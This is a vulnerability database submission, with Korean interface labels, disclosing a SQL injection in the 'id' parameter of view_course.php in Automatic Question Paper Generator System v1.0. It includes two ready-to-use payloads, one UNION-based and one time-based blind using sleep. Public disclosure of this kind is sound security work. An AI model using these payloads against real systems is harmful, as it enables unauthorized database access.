제출 #102701: Automatic Question Paper Generator System v1.0 /aqpg/admin/courses/view_course.php GET parameter id exists SQL injection vulnerability정보

제목Automatic Question Paper Generator System v1.0 /aqpg/admin/courses/view_course.php GET parameter id exists SQL injection vulnerability
설명An issue was discovered in Automatic Question Paper Generator System v1.0. There is a SQL injection that can directly issue instructions to the background database system via /aqpg/admin/courses/view_course.php?id. Payload1:id=1' union all select null,null,concat(0x75767778,0x45464748),null,null,null,null,null-- - Payload2:id=1' and (select 6 from (select(sleep(20)))d)-- e
원천⚠️ https://github.com/SecurityYH/bug_report/blob/main/SQLi-1.md
사용자
 Evan (UID 43177)
제출2023. 03. 17. AM 06:23 (3 연령 ago)
모더레이션2023. 03. 17. AM 07:23 (1 hour later)
상태수락
VulDB 항목223285 [SourceCodester Automatic Question Paper Generator System 1.0 GET Parameter view_course.php 아이디 SQL 주입]
포인트들20

이전개요다음

Want to stay up to date on a daily basis?

Enable the mail alert feature now!